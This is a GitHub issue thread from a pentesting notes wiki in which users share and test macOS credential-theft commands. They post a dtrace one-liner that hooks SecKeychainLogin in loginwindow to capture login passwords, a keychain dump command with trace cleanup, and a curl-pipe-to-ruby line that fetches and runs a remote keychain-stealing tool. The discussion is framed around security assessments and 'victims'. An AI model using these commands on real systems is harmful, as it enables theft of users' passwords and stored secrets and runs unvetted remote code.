search

pwnwiki / pwnwiki.github.io

PwnWiki - The notes section of the pentesters mind.
http://pwnwiki.io
MIT License
552 stars 270 forks source link

OS X Password sniffing #100

Open WebBreacher opened 9 years ago

WebBreacher commented 9 years ago

Don't have time to add this in the appropriate place:

_sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[RECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') (from https://twitter.com/fel1x/status/613420320104558592)

Dump whole OS X keychain: security dump-keychain -d login.keychain > keychain.txt && srm keychain.txt

OJ commented 9 years ago

This is what I get:

dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system

:cry: System info:

$ uname -a                                                                                                     ⏎
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
WebBreacher commented 9 years ago

@OJ - It was on Twitter so it has to be true!

Seriously though, the first command appears to work on my MBP:

└──> $ sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') dtrace: description 'pid$target::SecKeychainLogin:entry' matched 1 probe

And the second (dump the keychain) works too but pops up a "do you want this app to access your keychain" prompt for each cred that is being dumped. I'm VERY sure that users/victims will notice this.

└──> $ uname -a Darwin c02kj19lfft4.home 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64

OJ commented 9 years ago

hehe yeah sorry mate. I wasn't implying that it was you. I think it might rely on Yosemite (I'm still on Mavericks).

Fun stuff though!

WebBreacher commented 9 years ago

No worries....good to know where it does/does not work too. I'm on 10.9.5 OS X

sho-luv commented 9 years ago

Curl https://raw.githubusercontent.com/erran/keyjacker/master/keyjacker.rb | ruby

Co worker Erran wrote this when he was like 16 or so. Still works pretty well on assessments. Again you need to click allow which means you need gui access but I have pulled that off remotely with vnc. Not super stealthy but gets the job done.

Leon Johnson

On Jun 25, 2015, at 6:48 AM, OJ Reeves notifications@github.com wrote:

This is what I get:

dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system

System info:

$ uname -a ⏎ Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64 — Reply to this email directly or view it on GitHub.